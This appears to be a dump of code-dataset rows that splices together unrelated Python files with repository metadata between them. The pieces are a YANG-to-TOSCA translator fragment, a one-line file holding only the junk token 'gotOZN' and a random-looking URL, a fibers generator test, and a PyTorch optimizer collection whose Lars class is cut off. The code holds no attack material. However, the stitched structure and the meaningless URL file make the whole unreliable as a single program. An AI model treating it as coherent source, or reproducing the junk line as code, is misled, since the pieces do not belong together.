def _translate_yang(self):
self.log.debug(_('Translating the descriptors.'))
if self.NSD in self.yangs:
for nsd in self.yangs[self.NSD]:
self.log.debug(_("Translate descriptor of type nsd: {}").
format(nsd))
node_name = nsd.pop(ToscaResource.NAME).replace(' ','_')
node_name = node_name if node_name.endswith('nsd') else ''.join([node_name, '_nsd'])
tosca_node = TranslateDescriptors. \
YANG_TO_TOSCA_TYPE[self.NSD](
self.log,
node_name,
self.NSD,
nsd,
self.vnfd_files)
self.tosca_resources.append(tosca_node)
vnfd_name_list = []
if self.VNFD in self.yangs:
for vnfd in self.yangs[self.VNFD]:
if vnfd['name'] not in vnfd_name_list:
self.log.debug(_("Translate descriptor of type vnfd: {}").
format(vnfd))
vnfd_name_list.append(vnfd['name'])
tosca_node = TranslateDescriptors. \
YANG_TO_TOSCA_TYPE[self.VNFD](
self.log,
vnfd.pop(ToscaResource.NAME),
self.VNFD,
vnfd)
self.tosca_resources.append(tosca_node)
# First translate VNFDs
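        # (VNFDs are handled before NSDs so that each NSD's handle_yang() can resolve
        # references against the already-translated VNFD resources passed to it below.)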
for node in self.tosca_resources:
if node.type == self.VNFD:
self.log.debug(_("Handle yang for {0} of type {1}").
format(node.name, node.type_))
node.handle_yang()
# Now translate NSDs
for node in self.tosca_resources:
if node.type == self.NSD:
self.log.debug(_("Handle yang for {0} of type {1}").
format(node.name, node.type_))
node.handle_yang(self.tosca_resources)
return self.tosca_resources
def find_tosca_resource(self, name):
for resource in self.tosca_resources:
if resource.name == name:
return resource
def _find_yang_node(self, yang_name):
for node in self.nodetemplates:
if node.name == yang_name:
return node
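

# Illustrative usage sketch (hypothetical helper): assumes `log` is a
# logging.Logger-like object and `yangs` is a dict keyed by descriptor type,
# e.g. {'nsd': [...], 'vnfd': [...]}, which is the shape translate_metadata()
# and _translate_yang() above iterate over. The tosca_template argument is not
# consulted by translate() in the code shown here.
def _example_translate_descriptors(log, yangs):
    translator = TranslateDescriptors(log, yangs, tosca_template=None)
    # Lazily builds YANG_TO_TOSCA_TYPE on first call, then returns the list of
    # generated ToscaResource objects (VNFDs handled before NSDs).
    return translator.translate()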
| [
"[email protected]"
] | |
7c56516f441b0a72ae06e9f44126a1862c11d9ef | 8bd63bc56b39d26458ad54b7f18c4b149c1e3ce2 | /sphinx-files/rst-files/Data/code/2017/07/000715/jgpwjtuaoawbmpf.py | 871c670e4634997240d6eaa9ce8ab46848bc20d0 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain-disclaimer",
"LicenseRef-scancode-public-domain"
] | permissive | isabella232/scipy-central-rescue | 43270c0e1850b989fbe9a5b1a06c3be11d16464a | 2b331610d52c189ae96bea4f4ce2ec343146b608 | refs/heads/master | 2021-09-06T09:17:30.627497 | 2018-02-04T19:41:11 | 2018-02-04T19:41:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54 | py | gotOZN http://www.LnAJ7K8QSpkiStk3sLL0hQP6MO2wQ8gO.com | [
"[email protected]"
] | |
fed38d32e3c3d4c4c31ce116303ad6588a73d350 | 49cd488edb28d0433aaab9686e90ed90d134dd14 | /tests/test_generator.py | c422ffbb35a6f1b2df7ba62d732e99b0d49a368f | [
"MIT"
] | permissive | Dmdv/python-fibers | 349fab65a37475b2fee73bdc53960b1a289227bd | 20349077843033610864935e45977cf33d16a7e1 | refs/heads/master | 2021-01-15T20:53:34.925672 | 2013-08-06T21:19:08 | 2013-08-06T21:19:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,434 | py |
import sys
sys.path.insert(0, '../')
import unittest
import fibers
from fibers import Fiber
class genlet(Fiber):
def __init__(self, *args, **kwds):
self.args = args
self.kwds = kwds
Fiber.__init__(self, target=self.run)
def run(self):
fn, = self.fn
fn(*self.args, **self.kwds)
def __iter__(self):
return self
def __next__(self):
self.parent = fibers.current()
result = self.switch()
if self.is_alive():
return result
else:
raise StopIteration
    # Hack: Python 2 compatibility (the py2 iterator protocol calls next(), not __next__)
    next = __next__
def Yield(value):
g = fibers.current()
while not isinstance(g, genlet):
if g is None:
raise RuntimeError('yield outside a genlet')
g = g.parent
g.parent.switch(value)
def generator(func):
class generator(genlet):
fn = (func,)
return generator
# ____________________________________________________________
class GeneratorTests(unittest.TestCase):
def test_generator(self):
seen = []
def g(n):
for i in range(n):
seen.append(i)
Yield(i)
g = generator(g)
for k in range(3):
for j in g(5):
seen.append(j)
self.assertEqual(seen, 3 * [0, 0, 1, 1, 2, 2, 3, 3, 4, 4])
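

# Illustrative, hypothetical example of the generator()/Yield pattern above,
# used directly rather than through the unittest case.
@generator
def _example_countdown(n):
    # Yields n, n-1, ..., 1 through the fiber-backed generator machinery.
    while n > 0:
        Yield(n)
        n -= 1
# Iterating list(_example_countdown(3)) is expected to produce [3, 2, 1].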
if __name__ == '__main__':
unittest.main(verbosity=2)
| [
"[email protected]"
] | |
fac8ec60cc6c93ba0484b469e3c1814f07f23104 | 3b28143a893fcd6d2d0ed843db74eaf5f63fe542 | /pydatagrand/callback/optimizater.py | 603284a6359f1eea4369c77f94000b37cf2c16a2 | [] | no_license | gaozhanfire/daguan_2019_rank9 | 1e2f506c11067cf66ff0fe3a2460773f71955ef6 | 2b77a50455d33a8d484180fa548025b5ef72dfb6 | refs/heads/master | 2020-08-06T17:42:54.445208 | 2019-09-30T12:01:41 | 2019-09-30T12:01:41 | 213,096,559 | 1 | 0 | null | 2019-10-06T02:03:12 | 2019-10-06T02:03:11 | null | UTF-8 | Python | false | false | 66,068 | py | import math
import torch
import operator
from copy import copy
import functools
from math import sqrt
from torch.optim.optimizer import Optimizer
import itertools as it
from torch.nn.utils import clip_grad_norm_
from .utils import *
__all__ = ['SGDW',
'AdamW',
'AdaBound',
'Nadam',
'AdaFactor',
'WeightDecayOptimizerWrapper',
'NovoGrad',
'Lamb',
'Lars',
'RAdam',
'Ralamb',
'Lookahead',
'RaLars',
'Ranger',
'BertAdam'
]
class SGDW(Optimizer):
r"""Implements stochastic gradient descent (optionally with momentum) with
weight decay from the paper `Fixing Weight Decay Regularization in Adam`_.
Nesterov momentum is based on the formula from
`On the importance of initialization and momentum in deep learning`__.
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float): learning rate
momentum (float, optional): momentum factor (default: 0)
weight_decay (float, optional): weight decay factor (default: 0)
dampening (float, optional): dampening for momentum (default: 0)
nesterov (bool, optional): enables Nesterov momentum (default: False)
.. _Fixing Weight Decay Regularization in Adam:
https://arxiv.org/abs/1711.05101
Example:
>>> model = LSTM()
>>> optimizer = SGDW(model.parameters(), lr=0.1, momentum=0.9,weight_decay=1e-5)
"""
def __init__(self, params, lr=0.1, momentum=0, dampening=0,
weight_decay=0, nesterov=False):
if lr < 0.0:
raise ValueError(f"Invalid learning rate: {lr}")
if momentum < 0.0:
raise ValueError(f"Invalid momentum value: {momentum}")
if weight_decay < 0.0:
raise ValueError(f"Invalid weight_decay value: {weight_decay}")
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(SGDW, self).__init__(params, defaults)
def __setstate__(self, state):
super(SGDW, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.zeros_like(p.data)
buf.mul_(momentum).add_(d_p)
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(1 - dampening, d_p)
if nesterov:
d_p = d_p.add(momentum, buf)
else:
d_p = buf
if weight_decay != 0:
p.data.add_(-weight_decay, p.data)
p.data.add_(-group['lr'], d_p)
return loss
class AdamW(Optimizer):
"""Implements Adam algorithm.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
amsgrad (boolean, optional): whether to use the AMSGrad variant of this
algorithm from the paper `On the Convergence of Adam and Beyond`_
Example:
>>> model = LSTM()
>>> optimizer = AdamW(model.parameters(), lr=1e-3, weight_decay=1e-5)
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,
weight_decay=0, amsgrad=False):
if lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps,weight_decay=weight_decay, amsgrad=amsgrad)
#super(AdamW, self).__init__(params, defaults)
super().__init__(params, defaults)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
amsgrad = group['amsgrad']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsgrad:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(group['eps'])
else:
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
if group['weight_decay'] != 0:
decayed_weights = torch.mul(p.data, group['weight_decay'])
p.data.addcdiv_(-step_size, exp_avg, denom)
p.data.sub_(decayed_weights)
else:
p.data.addcdiv_(-step_size, exp_avg, denom)
return loss
class AdaBound(Optimizer):
"""Implements AdaBound algorithm.
It has been proposed in `Adaptive Gradient Methods with Dynamic Bound of Learning Rate`_.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): Adam learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
final_lr (float, optional): final (SGD) learning rate (default: 0.1)
gamma (float, optional): convergence speed of the bound functions (default: 1e-3)
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
amsbound (boolean, optional): whether to use the AMSBound variant of this algorithm
.. Adaptive Gradient Methods with Dynamic Bound of Learning Rate:
https://openreview.net/forum?id=Bkg3g2R9FX
Example:
>>> model = LSTM()
>>> optimizer = AdaBound(model.parameters())
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), final_lr=0.1, gamma=1e-3,
eps=1e-8, weight_decay=0, amsbound=False):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
if not 0.0 <= final_lr:
raise ValueError("Invalid final learning rate: {}".format(final_lr))
if not 0.0 <= gamma < 1.0:
raise ValueError("Invalid gamma parameter: {}".format(gamma))
defaults = dict(lr=lr, betas=betas, final_lr=final_lr, gamma=gamma, eps=eps,
weight_decay=weight_decay, amsbound=amsbound)
super(AdaBound, self).__init__(params, defaults)
self.base_lrs = list(map(lambda group: group['lr'], self.param_groups))
def __setstate__(self, state):
super(AdaBound, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('amsbound', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group, base_lr in zip(self.param_groups, self.base_lrs):
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider SparseAdam instead')
amsbound = group['amsbound']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
if amsbound:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsbound:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
if group['weight_decay'] != 0:
grad = grad.add(group['weight_decay'], p.data)
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
if amsbound:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(group['eps'])
else:
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
# Applies bounds on actual learning rate
# lr_scheduler cannot affect final_lr, this is a workaround to apply lr decay
final_lr = group['final_lr'] * group['lr'] / base_lr
lower_bound = final_lr * (1 - 1 / (group['gamma'] * state['step'] + 1))
upper_bound = final_lr * (1 + 1 / (group['gamma'] * state['step']))
step_size = torch.full_like(denom, step_size)
step_size.div_(denom).clamp_(lower_bound, upper_bound).mul_(exp_avg)
p.data.add_(-step_size)
return loss
class Nadam(Optimizer):
"""Implements Nadam algorithm (a variant of Adam based on Nesterov momentum).
It has been proposed in `Incorporating Nesterov Momentum into Adam`__.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 2e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
schedule_decay (float, optional): momentum schedule decay (default: 4e-3)
__ http://cs229.stanford.edu/proj2015/054_report.pdf
__ http://www.cs.toronto.edu/~fritz/absps/momentum.pdf
Originally taken from: https://github.com/pytorch/pytorch/pull/1408
NOTE: Has potential issues but does work well on some problems.
Example:
>>> model = LSTM()
>>> optimizer = Nadam(model.parameters())
"""
def __init__(self, params, lr=2e-3, betas=(0.9, 0.999), eps=1e-8,
weight_decay=0, schedule_decay=4e-3):
defaults = dict(lr=lr, betas=betas, eps=eps,
weight_decay=weight_decay, schedule_decay=schedule_decay)
super(Nadam, self).__init__(params, defaults)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
state['m_schedule'] = 1.
state['exp_avg'] = grad.new().resize_as_(grad).zero_()
state['exp_avg_sq'] = grad.new().resize_as_(grad).zero_()
# Warming momentum schedule
m_schedule = state['m_schedule']
schedule_decay = group['schedule_decay']
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
eps = group['eps']
state['step'] += 1
t = state['step']
if group['weight_decay'] != 0:
grad = grad.add(group['weight_decay'], p.data)
momentum_cache_t = beta1 * \
(1. - 0.5 * (0.96 ** (t * schedule_decay)))
momentum_cache_t_1 = beta1 * \
(1. - 0.5 * (0.96 ** ((t + 1) * schedule_decay)))
m_schedule_new = m_schedule * momentum_cache_t
m_schedule_next = m_schedule * momentum_cache_t * momentum_cache_t_1
state['m_schedule'] = m_schedule_new
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1. - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1. - beta2, grad, grad)
exp_avg_sq_prime = exp_avg_sq / (1. - beta2 ** t)
denom = exp_avg_sq_prime.sqrt_().add_(eps)
p.data.addcdiv_(-group['lr'] * (1. - momentum_cache_t) / (1. - m_schedule_new), grad, denom)
p.data.addcdiv_(-group['lr'] * momentum_cache_t_1 / (1. - m_schedule_next), exp_avg, denom)
return loss
class AdaFactor(Optimizer):
'''
# Code below is an implementation of https://arxiv.org/pdf/1804.04235.pdf
# inspired but modified from https://github.com/DeadAt0m/adafactor-pytorch
Example:
>>> model = LSTM()
>>> optimizer = AdaFactor(model.parameters(),lr= lr)
'''
def __init__(self, params, lr=None, beta1=0.9, beta2=0.999, eps1=1e-30,
eps2=1e-3, cliping_threshold=1, non_constant_decay=True,
enable_factorization=True, ams_grad=True, weight_decay=0):
enable_momentum = beta1 != 0
if non_constant_decay:
ams_grad = False
defaults = dict(lr=lr, beta1=beta1, beta2=beta2, eps1=eps1,
eps2=eps2, cliping_threshold=cliping_threshold,
weight_decay=weight_decay, ams_grad=ams_grad,
enable_factorization=enable_factorization,
enable_momentum=enable_momentum,
non_constant_decay=non_constant_decay)
super(AdaFactor, self).__init__(params, defaults)
def __setstate__(self, state):
super(AdaFactor, self).__setstate__(state)
def _experimental_reshape(self, shape):
temp_shape = shape[2:]
if len(temp_shape) == 1:
new_shape = (shape[0], shape[1]*shape[2])
else:
tmp_div = len(temp_shape) // 2 + len(temp_shape) % 2
new_shape = (shape[0]*functools.reduce(operator.mul,
temp_shape[tmp_div:], 1),
shape[1]*functools.reduce(operator.mul,
temp_shape[:tmp_div], 1))
return new_shape, copy(shape)
def _check_shape(self, shape):
'''
output1 - True - algorithm for matrix, False - vector;
output2 - need reshape
'''
if len(shape) > 2:
return True, True
        elif len(shape) == 2 and (shape[0] == 1 or shape[1] == 1):
            return False, False
        elif len(shape) == 2:
            return True, False
else:
return False, False
def _rms(self, x):
return sqrt(torch.mean(x.pow(2)))
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('Adam does not support sparse \
gradients, use SparseAdam instead')
is_matrix, is_need_reshape = self._check_shape(grad.size())
new_shape = p.data.size()
if is_need_reshape and group['enable_factorization']:
new_shape, old_shape = \
self._experimental_reshape(p.data.size())
grad = grad.view(new_shape)
state = self.state[p]
if len(state) == 0:
state['step'] = 0
if group['enable_momentum']:
state['exp_avg'] = torch.zeros(new_shape,
dtype=torch.float32,
device=p.grad.device)
if is_matrix and group['enable_factorization']:
state['exp_avg_sq_R'] = \
torch.zeros((1, new_shape[1]),
dtype=torch.float32,
device=p.grad.device)
state['exp_avg_sq_C'] = \
torch.zeros((new_shape[0], 1),
dtype=torch.float32,
device=p.grad.device)
else:
state['exp_avg_sq'] = torch.zeros(new_shape,
dtype=torch.float32,
device=p.grad.device)
if group['ams_grad']:
state['exp_avg_sq_hat'] = \
torch.zeros(new_shape, dtype=torch.float32,
device=p.grad.device)
if group['enable_momentum']:
exp_avg = state['exp_avg']
if is_matrix and group['enable_factorization']:
exp_avg_sq_r = state['exp_avg_sq_R']
exp_avg_sq_c = state['exp_avg_sq_C']
else:
exp_avg_sq = state['exp_avg_sq']
if group['ams_grad']:
exp_avg_sq_hat = state['exp_avg_sq_hat']
state['step'] += 1
lr_t = group['lr']
lr_t *= max(group['eps2'], self._rms(p.data))
if group['enable_momentum']:
if group['non_constant_decay']:
beta1_t = group['beta1'] * \
(1 - group['beta1'] ** (state['step'] - 1)) \
/ (1 - group['beta1'] ** state['step'])
else:
beta1_t = group['beta1']
exp_avg.mul_(beta1_t).add_(1 - beta1_t, grad)
if group['non_constant_decay']:
beta2_t = group['beta2'] * \
(1 - group['beta2'] ** (state['step'] - 1)) / \
(1 - group['beta2'] ** state['step'])
else:
beta2_t = group['beta2']
if is_matrix and group['enable_factorization']:
exp_avg_sq_r.mul_(beta2_t). \
add_(1 - beta2_t, torch.sum(torch.mul(grad, grad).
add_(group['eps1']),
dim=0, keepdim=True))
exp_avg_sq_c.mul_(beta2_t). \
add_(1 - beta2_t, torch.sum(torch.mul(grad, grad).
add_(group['eps1']),
dim=1, keepdim=True))
v = torch.mul(exp_avg_sq_c,
exp_avg_sq_r).div_(torch.sum(exp_avg_sq_r))
else:
exp_avg_sq.mul_(beta2_t). \
addcmul_(1 - beta2_t, grad, grad). \
add_((1 - beta2_t)*group['eps1'])
v = exp_avg_sq
g = grad
if group['enable_momentum']:
g = torch.div(exp_avg, 1 - beta1_t ** state['step'])
if group['ams_grad']:
torch.max(exp_avg_sq_hat, v, out=exp_avg_sq_hat)
v = exp_avg_sq_hat
u = torch.div(g, (torch.div(v, 1 - beta2_t **
state['step'])).sqrt().add_(group['eps1']))
else:
u = torch.div(g, v.sqrt())
u.div_(max(1, self._rms(u) / group['cliping_threshold']))
p.data.add_(-lr_t * (u.view(old_shape) if is_need_reshape and
group['enable_factorization'] else u))
if group['weight_decay'] != 0:
p.data.add_(-group['weight_decay'] * lr_t, p.data)
return loss
class WeightDecayOptimizerWrapper(Optimizer):
'''
Example:
>>> from torch.optim import Adam
>>> model = LSTM()
>>> optimizer = WeightDecayOptimizerWrapper(Adam(model.parameters(),lr = 1e-3),weight_decay=0.05)
'''
def __init__(self, optimizer, weight_decay, change_with_lr = True):
self.optimizer = optimizer
if isinstance(weight_decay, (list, tuple)):
assert len(weight_decay) == len(self.optimizer.param_groups)
assert all((x >= 0 for x in weight_decay))
self.weight_decays = weight_decay
else:
assert weight_decay >= 0
self.weight_decays = [weight_decay] * \
len(self.optimizer.param_groups)
self.state = self.optimizer.state
self.change_with_lr = change_with_lr
def step(self, closure=None) -> None:
for group, weight_decay in zip(self.optimizer.param_groups, self.weight_decays):
for param in group['params']:
if param.grad is None or weight_decay == 0:
continue
if self.change_with_lr:
param.data = param.data.add(
-weight_decay * group['lr'], param.data)
else:
param.data.add_(-weight_decay, param.data)
self.optimizer.step()
def zero_grad(self) -> None:
self.optimizer.zero_grad()
def add_param_group(self, param_group):
self.optimizer.add_param_group(param_group)
def load_state_dict(self, state_dict):
self.optimizer.load_state_dict(state_dict)
def state_dict(self):
return self.optimizer.state_dict()
def __repr__(self):
return self.optimizer.__repr__()
def __getstate__(self):
return self.optimizer.__getstate__()
def __setstate__(self, state):
self.optimizer.__setstate__(state)
self.state = self.optimizer.state
@property
def param_groups(self):
return self.optimizer.param_groups
class NovoGrad(Optimizer):
"""Implements NovoGrad algorithm.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 1e-2)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.95, 0.98))
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
Example:
>>> model = ResNet()
>>> optimizer = NovoGrad(model.parameters(), lr=1e-2, weight_decay=1e-5)
"""
def __init__(self, params, lr=0.01, betas=(0.95, 0.98), eps=1e-8,
weight_decay=0,grad_averaging=False):
if lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps,weight_decay=weight_decay,grad_averaging = grad_averaging)
super().__init__(params, defaults)
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('NovoGrad does not support sparse gradients')
state = self.state[p]
g_2 = torch.sum(grad ** 2)
if len(state) == 0:
state['step'] = 0
state['moments'] = grad.div(g_2.sqrt() +group['eps']) + \
group['weight_decay'] * p.data
state['grads_ema'] = g_2
moments = state['moments']
grads_ema = state['grads_ema']
beta1, beta2 = group['betas']
state['step'] += 1
grads_ema.mul_(beta2).add_(1 - beta2, g_2)
denom = grads_ema.sqrt().add_(group['eps'])
grad.div_(denom)
# weight decay
if group['weight_decay'] != 0:
decayed_weights = torch.mul(p.data, group['weight_decay'])
grad.add_(decayed_weights)
# Momentum --> SAG
if group['grad_averaging']:
grad.mul_(1.0 - beta1)
moments.mul_(beta1).add_(grad) # velocity
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
p.data.add_(-step_size, moments)
return loss
class Lamb(Optimizer):
"""Implements the Lamb optimizer from https://arxiv.org/pdf/1904.00962v3.pdf
Args:
params (iterable): iterable of parameters to optimize or dicts defining parameter groups
lr (float, optional): learning rate
betas (Tuple[float, float], optional): coefficients used for computing running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
scale_clip (tuple, optional): the lower and upper bounds for the weight norm in local LR of LARS
Example:
>>> model = ResNet()
>>> optimizer = Lamb(model.parameters(), lr=1e-2, weight_decay=1e-5)
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0,
scale_clip=None):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
super(Lamb, self).__init__(params, defaults)
# LARS arguments
self.scale_clip = scale_clip
if self.scale_clip is None:
self.scale_clip = (0, 10)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('RAdam does not support sparse gradients')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
# Gradient term correction
update = torch.zeros_like(p.data)
denom = exp_avg_sq.sqrt().add_(group['eps'])
update.addcdiv_(1, exp_avg, denom)
# Weight decay
if group['weight_decay'] != 0:
update.add_(group['weight_decay'], p.data)
# LARS
p_norm = p.data.pow(2).sum().sqrt()
update_norm = update.pow(2).sum().sqrt()
phi_p = p_norm.clamp(*self.scale_clip)
# Compute the local LR
if phi_p == 0 or update_norm == 0:
local_lr = 1
else:
local_lr = phi_p / update_norm
state['local_lr'] = local_lr
p.data.add_(-group['lr'] * local_lr, update)
return loss
class Lars(Optimizer):
r"""Implements the LARS optimizer from https://arxiv.org/pdf/1708.03888.pdf
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float): learning rate
momentum (float, optional): momentum factor (default: 0)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
dampening (float, optional): dampening for momentum (default: 0)
nesterov (bool, optional): enables Nesterov momentum (default: False)
scale_clip (tuple, optional): the lower and upper bounds for the weight norm in local LR of LARS
Example:
>>> model = ResNet()
>>> optimizer = Lars(model.parameters(), lr=1e-2, weight_decay=1e-5)
"""
def __init__(self, params, lr, momentum=0, dampening=0,
weight_decay=0, nesterov=False, scale_clip=None):
if lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(Lars, self).__init__(params, defaults)
# LARS arguments
self.scale_clip = scale_clip
